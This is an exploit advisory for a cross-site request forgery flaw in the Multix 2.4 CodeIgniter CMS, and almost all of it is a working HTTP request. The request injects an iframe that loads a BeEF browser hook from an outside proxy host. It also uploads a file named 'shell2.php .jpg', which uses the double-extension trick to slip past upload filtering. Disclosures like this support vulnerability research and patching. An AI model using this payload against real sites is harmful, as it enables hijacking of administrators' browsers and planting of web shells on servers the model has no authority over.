Multix 2.4 Cross Site Request Forgery

`# Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://codecanyon.net  
# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596  
# Version: Version 2.4  
# Tested on Ubuntu 18.04  
  
  
-------Request-----------  
POST /admin/file/add HTTP/1.1  
Host: localhost  
Content-Length: 466  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"  
Origin: http://localhost  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5Ve  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: empty  
Referer: http://localhost/admin/file/add  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: allow=1;  
Connection: close  
  
------WebKitFormBoundaryE0mBtYGic6umB5Ve  
Content-Disposition: form-data; name="file_title"  
  
<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>  
------WebKitFormBoundaryE0mBtYGic6umB5Ve  
Content-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"  
Content-Type: image  
  
asdasd  
------WebKitFormBoundaryE0mBtYGic6umB5Ve  
Content-Disposition: form-data; name="form1"  
  
  
------WebKitFormBoundaryE0mBtYGic6umB5Ve--  
`